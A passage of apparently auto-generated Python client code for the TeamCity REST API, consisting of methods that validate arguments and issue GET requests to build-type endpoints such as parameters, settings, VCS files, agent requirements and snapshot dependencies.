def __get_investigations_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_investigations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_investigations_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: Investigations
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_investigations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_investigations`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/investigations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Investigations', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_metadata_with_http_info(self, path, bt_locator, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_metadata_with_http_info(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str bt_locator: (required)
:param str fields:
:param bool resolve_parameters:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'bt_locator', 'fields', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_metadata" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_metadata`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_metadata`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_metadata`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest/metadata{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='File', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelProperty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_type_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_type_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: Type
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_type`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_type`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Type', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_type_raw_value_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_type_raw_value_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_type_raw_value" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_type_raw_value`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_type_raw_value`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type/rawValue', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_value_long_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_value_long_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_value_long" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_value_long`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_value_long`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/value', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_value_long_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_value_long_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_value_long_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_value_long_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_value_long_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}/value', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_requirement_setting_with_http_info(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""get_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator', 'field_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_requirement_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_requirement_setting`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `get_requirement_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `get_requirement_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}/{fieldName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_root_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_root_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'base_path', 'locator', 'fields', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_root`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_settings_file_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_settings_file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_settings_file_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_settings_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_settings_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settingsFile', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""get_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:param str fields:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'snapshot_dep_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_snapshot_dep`") # noqa: E501
# verify the required parameter 'snapshot_dep_locator' is set
if ('snapshot_dep_locator' not in params or
params['snapshot_dep_locator'] is None):
raise ValueError("Missing the required parameter `snapshot_dep_locator` when calling `get_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'snapshot_dep_locator' in params:
if isinstance(params['snapshot_dep_locator'], TeamCityObject):
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'].locator_id
else:
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_snapshot_deps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_snapshot_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_snapshot_deps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: SnapshotDependencies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_deps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_snapshot_deps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
